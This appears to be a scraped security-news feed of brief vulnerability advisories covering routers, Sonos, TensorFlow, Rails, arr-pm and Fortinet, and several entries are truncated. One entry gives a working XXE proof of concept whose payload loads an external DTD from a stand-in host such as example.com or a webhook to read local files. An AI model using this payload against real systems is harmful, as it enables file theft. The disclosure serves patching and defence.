lenovo warranty check/lookup | check warranty status | lenovo support us

H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the CMD parameter at /goform/aspForm.

Tenda W20E router V15.11.0.6 (US_W20EV4.0br_V15.11.0.6(1068_1546_841)_CN_TDC) contains a stack overflow vulnerability in the function formDelDhcpRule with the request /goform/delDhcpRules/

A vulnerability in Zammad v5.3.0 allows attackers to execute arbitrary code or escalate privileges via a crafted message sent to the server.

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.UnsortedSegmentJoin` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `num_segments` is a positive scalar but there is no validation. Since this value is used to allocate the output tensor, a negative value would result in a `CHECK`-failure (assertion failure), as per TFSA-2021-198. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

By Deeba Ahmed The 28-year-old Ukrainian national Glib Oleksandr Ivanov-Tolpintsev was arrested in Poland and extradited to the USA in 2020.… This is a post from HackRead.com Read the original post: US Sentence Ukrainian to 4 Years for Brute-forcing and Selling Login Credentials

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Sonos One Speaker 70.3-35220. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of the SMB directory query command. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19845.

### Impact Arbitrary shell execution is possible when using RPM::File#files and RPM::File#extract if the RPM contains a malicious "payload compressor" field. This vulnerability impacts the `extract` and `files` methods of the `RPM::File` class in the affected versions of this library. ### Patches Version 0.0.12 is available with a fix for these issues. ### Workarounds When using an affected version of this library (arr-pm), ensure any RPMs being processed contain valid/known payload compressor values. Such values include: gzip, bzip2, xz, zstd, and lzma. You can check the payload compressor field in an rpm by using the rpm command line tool. For example: ``` % rpm -qp example-1.0-1.x86_64.rpm --qf "%{PAYLOADCOMPRESSOR}\n" gzip ``` ### Impact on known dependent projects This library is used by [fpm](https://github.com/jordansissel/fpm). The vulnerability may impact fpm only when using the flag `-s rpm` or `--input-type rpm` to convert a malicious rpm to another format. It does...

There is a vulnerability in Action Controller’s redirect_to. This vulnerability has been assigned the CVE identifier CVE-2023-22797. Versions Affected: >= 7.0.0 Not affected: < 7.0.0 Fixed Versions: 7.0.4.1 Impact There is a possible open redirect when using the redirect_to helper with untrusted user input. Vulnerable code will look like this: ``` redirect_to(params[:some_param]) ``` Rails 7.0 introduced protection against open redirects from calling redirect_to with untrusted user input. In prior versions the developer was fully responsible for only providing trusted input. However the check introduced could be bypassed by a carefully crafted URL. All users running an affected release should either upgrade or use one of the workarounds immediately. Releases The FIXED releases are available at the normal locations. Workarounds There are no feasible workarounds for this issue. Patches To aid users who aren’t able to upgrade immediately we have provided patches for the two suppor...

### Summary Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) ### Details Check ` $pattern = '/encoding="(.*?)"/';` easy to bypass. Just use a single quote symbol `'`. So payload looks like this: ``` <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]> ``` If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. ### PoC 1) Create simple xlsx file 2) Rename xlsx to zip 3) Go to the zip and open the `xl/sharedStrings.xml` file in edit mode. 4) Replace `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>` to ``` <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]> ``` 5) Save `sharedStrings.xml` file and rename zip back to xlsx. 6) Use mi...

This Metasploit module exploits an authentication bypass vulnerability in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain access to a chosen account and then adds an SSH key to the authorized_keys file of the chosen account, allowing you to login to the system with the chosen account. Successful exploitation results in remote code execution.